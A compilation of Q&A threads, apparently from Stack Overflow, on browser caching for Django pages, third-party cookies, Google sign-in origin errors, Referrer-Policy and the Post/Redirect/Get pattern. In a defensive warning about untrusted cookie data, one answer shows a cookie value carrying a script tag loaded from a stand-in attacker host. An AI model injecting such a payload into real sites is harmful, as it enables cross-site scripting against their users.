Cache website to browser when navigating back - django

I have a single url/page of my website that I want to be cached to browser, so whenever a user navigates away from that page, and then presses the BACK button of the browser, I don't want that request to go to django at all, but serve the cached version of the page that is in the browser. Also, I can't use solutions that cache the page in between the web server and Django, as every user has different permissions on what data they can see.
So I added this in my nginx config:
...
location /search {
    expires 300s;
    add_header Cache-Control "private";
    ...
And this works very well, 50% of the time :). How can I make it work always?

whenever a user navigates away from that page, and then presses the BACK button of the browser, I don't want that request to go to django at all, but serve the cached version of the page that is in the browser
For some browsers, this is the default behavior - if you have set no caching directives on the server, then it will keep not only a copy of the response but the entire rendered page in memory, so that when you click the back button, it can be shown instantly.
But if you want to explicitly instruct the browser to cache the response you can use a max-age directive on the Cache-Control header. Set
Cache-Control: max-age=3600
This is a more modern and reliable way than using an "Expires" header, especially for small durations. If the user's browser has the incorrect time or time zone set, "Expires" might not work at all, but "max-age" still should.
If you are serving each person a different version of the page, you can also add "private" to prevent caching by proxies (as in your example):
Cache-Control: private, max-age=3600
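If you would rather set this header from the Django application itself instead of nginx, Django's built-in cache_control decorator produces the same header. A minimal sketch; the view name search is only an assumption based on your /search location:

from django.views.decorators.cache import cache_control

# Emits "Cache-Control: private, max-age=3600" on every response from this view.
@cache_control(private=True, max_age=3600)
def search(request):
    ...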
Note: you can't force a browser to always use the cache. If you are noticing that sometimes it doesn't use the cache, it could be:
The item in the cache has expired. You were giving it only 5 minutes, so 5 minutes after the response that went into the cache, requesting the page again will send the request through to the remote server - even if there have been other requests in the meantime.
The browser cache became full and some items were purged.
For some reason the browser believed or was configured to believe that the response should not be cached regardless of cache directives.
The user pressed reload.
A proxy between client and server stripped the Cache-Control or other headers.


Origin is "not allowed" for given client ID when origin was added

Note: My site is in production mode, not testing. It is pending verification because I added an icon; this issue existed before the verification was started.
Whenever my browser makes a request to Google for the one-tap widget or the pill, both requests return 400 Bad Request with an empty HTML page, and a message is logged to the console stating "The given origin is not allowed for the given client ID." I've gone into the Google Cloud Console and checked my origins. I have only one listed, and it's the exact site I'm sending requests from in my browser. My site also has its traffic proxied through Cloudflare, if that makes a difference. In addition, I am using JavaScript callbacks (which work when used in PI#1).
Potential issue #1: The URLs are typed in wrong
When I insert localhost (I add both https and http because I test with an HTTPS web server locally using a Cloudflare origin certificate), the requests go through perfectly. However, the moment the requests come from my browser when it's not localhost, the requests fail. I've copied and pasted straight from the URL bar just to make sure there are no typos, but the same results return.
Potential issue #2: The widget is making bad requests
I did open the URLs in other tabs (which yield the same results as in PI#1) and insert bogus URLs like example.com and thisisnotaurl.com to ensure it's not just dropping every request. Those requests return 403 Forbidden instead of 400 Bad Request.
Potential issue #3: The issue is browser specific
I've checked this issue on both Firefox and Microsoft Edge, both on the stable branches and completely up to date. I've disabled my ad block (uBlock Origin & Firefox built-in protection) to ensure they aren't interfering with requests, but everything works except the crucial requests, which still fail with 400 Bad Request. I have yet to test other browsers as I do not have them installed, but I assume they would behave the same.
An example of the code can be found here: https://gist.github.com/Coder-Tavi/772ea25b16f3fa0b6b0e04739a1689dd.
The origins shown below are the exact website I am accessing. In addition, I've verified the client IDs are exactly the same as the ones I have added.
Referrer Policy is improperly configured
The HTTP header Referrer-Policy controls exactly how much data about the origin of a request is sent to servers. In most cases, this is set to same-origin, which means that the Referer header is only sent with requests going to the same origin.
Consider a web server at example.com with a Referrer-Policy of same-origin. When a page on example.com requests another resource on example.com, the Referer header will be sent, since the request stays within the same origin. However, if example.com sends a request to google.com, the Referer header will not send any origin data, as google.com and example.com are not the same origin.
If we look at the requests, this directive is what we see
As such, we need to update the directive to allow the browser to send the origin in the Referer header. This can be done by inserting the following into the HTML of the current page.
<meta name="referrer" content="origin">
This meta tag tells the browser to send only the origin (not the full URL) to other web servers, and as such, Google will see the origin.
Consider the example above again. This time, when example.com sends a request to google.com, the request will contain a Referer header with the origin, as the directive allows for sharing of the origin. However, with this current policy, only the origin is sent, not the query parameters and other parts of the URL. With the following URL: https://example.com/test/123, google.com will only see https://example.com. The MDN Web Docs contain all the possible values and their effects.
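If the page is served by a framework you control, the same policy can also be set as a response header instead of (or in addition to) the meta tag. As a hedged example only - nothing in the question says the site runs Django - a Django backend could do it with the SECURE_REFERRER_POLICY setting:

# settings.py -- SecurityMiddleware turns this into a
# "Referrer-Policy: origin" response header (Django 3.0+).
SECURE_REFERRER_POLICY = "origin"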

Can I set a cookie in this situation?

I want to post a banner ad on a.com. For this to happen, a.com has to query b.com for the banner URL via JSONP. When requested, b.com returns something like this:
{
    "img_url": "www.c.com/banner.jpg"
}
My question is: is it possible for c.com to set a cookie on the client browser so that it knows if the client has seen this banner image already?
To clarify:
c.com isn't trying to track any information on a.com. It just wants to set a third-party cookie on the client browser for tracking purposes.
I have no control over a.com, so I cannot write any client-side JS or ask them to include any external JS files. I can only expose a query URL on b.com for a.com's programmer to query.
I have total control of b.com and c.com.
When a.com receives the banner URL via JSONP, it will insert the banner dynamically into its DOM for display purposes.
A small follow up question:
Since I don't know how a.com's programmer will insert the banner into the DOM, is it possible for them to request the image from c.com but still prevent c.com from setting any third-party cookies?
is it possible for c.com to set a cookie on the client browser so that it knows if the client has seen this banner image already?
Not based on the requests so far. c.com isn't involved beyond being mentioned by b.com.
If the data in the response from b.com was used to make a request to www.c.com, then www.c.com could include cookie-setting headers in its response.
Subsequent requests to www.c.com from the same browser would echo those cookies back.
These would be third party cookies, so are more likely to be blocked by privacy settings.
Simple Version
In the HTTP response from c.com, you can send a Set-Cookie header.
If the browser does end up loading www.c.com/banner1234.jpg and later www.c.com/banner7975.jpg, you can send e.g. Set-Cookie: seen_banners=1234,7975 to keep track of which banners have been seen.
When the HTTP request arrives at www.c.com, it will contain a header like Cookie: seen_banners=1234,7975 and you can parse out which banners have been seen.
If you use separate cookies like this:
Set-Cookie: seen_1234=true
Set-Cookie: seen_7975=true
Then you'll get back request headers like:
Cookie: seen_1234=true; seen_7975=true
The choice is up to you in terms of how much parsing you want to do of the values. Also note that there are many cookie attributes you may consider setting.
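Putting the pieces together, here is a rough sketch of what the banner endpoint on www.c.com might look like if it were, say, a Django view; the view name, file layout and cookie lifetime are illustrative assumptions, not something from the question:

from django.http import FileResponse

def serve_banner(request, banner_id):
    # Uses the per-banner cookie format shown above: seen_<id>=true
    already_seen = request.COOKIES.get(f"seen_{banner_id}") == "true"
    response = FileResponse(open(f"banners/{banner_id}.jpg", "rb"))
    if not already_seen:
        # Mark the banner as seen. SameSite=None plus Secure is what modern
        # browsers require before they will send a cookie in a third-party
        # context at all (and they may still block it, per the caveats below).
        response.set_cookie(f"seen_{banner_id}", "true",
                            max_age=30 * 24 * 3600,
                            samesite="None", secure=True)
    return response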
Caveats
Some modern browsers and ad-blocking extensions will block these cookies as an anti-tracking measure. They can't know your intentions.
These cookies will be visible to www.c.com only.
Cookies have size restrictions imposed by browsers and even some firewalls. These can be restrictions in per-cookie length, length of the sum of cookies per domain, or just number of cookies. I've encountered a firewall that allowed a certain number of bytes in Cookie: request headers and dropped all Cookie: headers beyond that size. Some older mobile devices have very small limits on cookie size.
Cookies are editable by the user and can be tampered with by men-in-the-middle. Consider adding an authenticator over your cookie value, such as an HMAC, so that you can be sure the values you read are values you wrote. This won't defend against replay attacks unless you include a replay defense such as a timestamp before signing the cookie.
This is really important: Cookies you receive at your server in HTTP requests must be considered adversary-controlled data. Unless you've put in protections like that HMAC (and you keep your HMAC secret really secret!) don't put those values in trusted storage without labeling them tainted. If you make a dashboard for tracking banner impressions and you take the text of the cookie values from requests and display them in a browser, you might be in trouble if someone sends:
Cookie: seen_banners=<script src="http://evil.domain.com/attack_banner_author.js"></script>
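To make the HMAC-plus-timestamp idea concrete, here is a minimal sketch; the secret, the value|timestamp|mac layout and the one-hour window are illustrative choices, not part of the answer above:

import hashlib
import hmac
import time

SECRET = b"keep-this-really-secret"   # placeholder; store it somewhere safe

def sign_cookie(value):
    # Append a timestamp, then a MAC over the value and timestamp.
    payload = f"{value}|{int(time.time())}"
    mac = hmac.new(SECRET, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}|{mac}"

def verify_cookie(signed, max_age=3600):
    try:
        value, ts, mac = signed.rsplit("|", 2)
        ts = int(ts)
    except ValueError:
        return None   # malformed cookie
    expected = hmac.new(SECRET, f"{value}|{ts}".encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):
        return None   # signature mismatch: the value was tampered with
    if time.time() - ts > max_age:
        return None   # too old: a crude replay defense
    return value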
Aside: I've answered your question, but I feel obligated to warn you that JSONP is really, really dangerous to the users of www.a.com. Please consider alternatives, such as just serving back HTML with an img tag.

Django Upstream Caching (Vary On Headers) Not working

I have a view which displays user-specific content, meaning the content of the response for the same URL is unique per individual authenticated user.
Ideally, these pages would be cached in the browser. However, that does not appear to be the case in Chrome or Firefox (on production or locally).
The development server is processing the view each time, despite the fact that I've set the @vary_on_cookie decorator.
I have the right middleware in place (in the right order):
django.middleware.cache.UpdateCacheMiddleware
django.middleware.cache.FetchFromCacheMiddleware
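To make it concrete, the configuration looks roughly like this (the view name is a placeholder, and the exact setting name depends on the Django version):

# settings.py -- UpdateCacheMiddleware first, FetchFromCacheMiddleware last
MIDDLEWARE = [
    "django.middleware.cache.UpdateCacheMiddleware",
    # ... the rest of the middleware ...
    "django.middleware.cache.FetchFromCacheMiddleware",
]

# views.py -- the decorator adds "Vary: Cookie" so cached copies are per-user
from django.views.decorators.vary import vary_on_cookie

@vary_on_cookie
def my_view(request):
    ...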
Do I need to set CACHE_MIDDLEWARE_ANONYMOUS_ONLY = False?
One thing that I've noticed is that the request is sending this cache control header:
Cache-Control:max-age=0
I assume that that might be the root problem. Or is this related to the development server?
Any suggestions?

Does every web request send the browser cookies?

Does every web request send the browser's cookies?
I'm not talking page views, but a request for an image, .js file, etc.
Update
If a web page has 50 elements, that is 50 requests. Why would it send the SAME cookie(s) for each request? Doesn't it cache or know it already has it?
Yes, as long as the URL requested is within the same domain and path defined in the cookie (and all of the other restrictions -- secure, httponly, not expired, etc) hold, then the cookie will be sent for every request.
As others have said, if the cookie's host, path, etc. restrictions are met, it'll be sent, 50 times.
But you also asked why: because cookies are an HTTP feature, and HTTP is stateless. HTTP is designed to work without the server storing any state between requests.
In fact, the server doesn't have a solid way of recognizing which user is sending a given request; there could be a thousand users behind a single web proxy (and thus IP address). If the cookies were not sent every request, the server would have no way to know which user is requesting whatever resource.
Finally, the browser has no clue if the server needs the cookies or not, it just knows the server instructed it to send the cookie for any request to foo.com, so it does so. Sometimes images need them (e.g., dynamically-generated per-user), sometimes not, but the browser can't tell.
Yes. Every request sends the cookies that belong to the same domain. They're not cached, as HTTP is stateless, which means every request must be enough for the server to figure out what to do with it. Say you have images that are only accessible by certain users; you must send your auth cookie with every one of those 50 requests, so the server knows it's you and not someone else, or a guest, among the pool of requests it's getting.
Having said that, cookies might not be sent given other restrictions mentioned in the other responses, such as the HTTPS setting, path or domain. An important thing to notice there: cookies are not shared between domains. That helps with reducing the size of HTTP calls for static files, such as the images and scripts you mentioned.
Example: you have 4 cookies at www.stackoverflow.com; if you make a request to www.stackoverflow.com/images/logo.png, all those 4 cookies will be sent.
However, if you request stackoverflow.com/images/logo.png (notice the subdomain change) or images.stackoverflow.com/logo.png, those 4 cookies won't be present - but maybe those related to these domains will.
You can read more about cookies and image requests, for example, in this Stack Overflow blog post.
No. Not every request sends the cookies. It depends on the cookie configuration and client-server connection.
For example, if your cookie's secure option is set to true, then it must be transmitted over a secure HTTPS connection. This means that when you visit that website over plain HTTP, these cookies won't be sent by browsers, as the secure flag is true.
3 years have passed
There's another reason why a browser wouldn't send cookies. You can add a crossorigin attribute to your <script> tag and set the value to "anonymous". This will prevent cookies from being sent to the destination server. 99.9% of the time, your JavaScript files are static, and you don't generate that JS code based on the request's cookies. If you have 1KB of cookies and 200 resources on your page, then your user is uploading 200KB, which might take some time on 3G while having zero effect on the resulting page. Visit HTML attribute: crossorigin for reference.
Cookie has a "path" property. If "path=/", the answer is Yes.
I know this is an old thread, but I've just noticed that most browsers won't send cookies for a domain if you add a trailing dot. For example, http://example.com. won't receive cookies set for .example.com. Apache, on the other hand, treats them as the same host. I find this useful for making cross-domain tracking more difficult for external resources I include, but you could also use it for performance reasons. Note this breaks validation of HTTPS certificates. I've run a few tests using Browsershots and my own devices. The hack works on almost all browsers except for Safari (mobile and desktop), which will include cookies in the request.
Short answer is Yes. The lines below are from the MDN documentation on cookies:
Cookies were once used for general client-side storage. While this was legitimate when they were the only way to store data on the client, it is now recommended to use modern storage APIs. Cookies are sent with every request, so they can worsen performance (especially for mobile data connections).

Setting up cache with Django to work around the "page has expired" IE problem

I have got a familiar problem. I am using Django-0.97, and cannot upgrade -- though the version of Django being used should not play any part in the cause of the problem.
I have a search view that presents a form to the user, and, on submission of the form via POST, performs heavy computations and displays a list of items that are generated as a result of those computations. Users may click on the "more info" link of any of those items to view the item detail page.
Users on IE, once they are on the item detail page for any item from the search results page, get the familiar "webpage has expired, click on refresh button, yadda yadda yadda" error when they hit the "back" button on the browser. Sadly, a good majority of the users of the site use IE, are not tech savvy, and are complaining about this problem.
Thinking that setting up a cache backend may solve the problem, I configured a simple cache backend. I juggled with per-site cache and per-view cache, but to no avail. And now, I am not too sure I have set up the cache stuff properly.
Any hints, suggestions that may help in mitigating the problem will be hugely appreciated.
Thanks.
UPDATE (20 July 2009)
I have used Fiddler to inspect the HTTP headers of both the request and response. IE is sending the Pragma: no-cache header in the POST request. The HTTP response generated as a result of the request has the following headers:
Cache-Control: public, max-age=3600
Date: someDateHere
Vary: Cookie
And, yes, I am not using the PRG pattern.
You may find you need to use the PRG pattern (Post/Redirect/Get). With this pattern, the handler for the POST will:
perform the heavy computations, determine the search results, and store them in the user's session (or store them in the db keyed by the user's session).
send a response with a redirect header to an idempotent page, which is then fetched by the browser using a GET when it follows the redirection.
When the redirected-to page is accessed, the server displays the search results page, computed from the stored data in the session, and at a different URL from the URL that was POSTed to. You should be able to use normal caching headers for this (search results) page, depending on how volatile your search results will be.
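A hedged sketch of that flow in Django; the view names, URL and templates are made up, and django.shortcuts.render did not exist back in Django 0.97, so treat this as the shape of the solution rather than drop-in code:

from django.http import HttpResponseRedirect
from django.shortcuts import render

def search(request):
    if request.method == "POST":
        # Stand-in for the heavy computation; store the results in the session.
        results = sorted(request.POST.get("q", "").split())
        request.session["search_results"] = results
        # Redirect so the browser ends up on an idempotent GET page.
        return HttpResponseRedirect("/search/results/")
    return render(request, "search_form.html")

def search_results(request):
    results = request.session.get("search_results", [])
    return render(request, "search_results.html", {"results": results})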
Under RFC2616, "POST" is not an idempotent method, which means that the browser will not resend the request unless the user confirms that resend. So, to prevent the prompt, you must ensure that the CLIENT caches the page.
To do so, use the Cache-Control header: http://www.fiddler2.com/redir/?id=httpperf and ensure that you are not sending back any Vary or Pragma: no-cache headers: http://blogs.msdn.com/ieinternals/archive/2009/06/17/9769915.aspx
It would be helpful for you to capture your HTTP POST's response headers (e.g. with Fiddler) and update your question with them.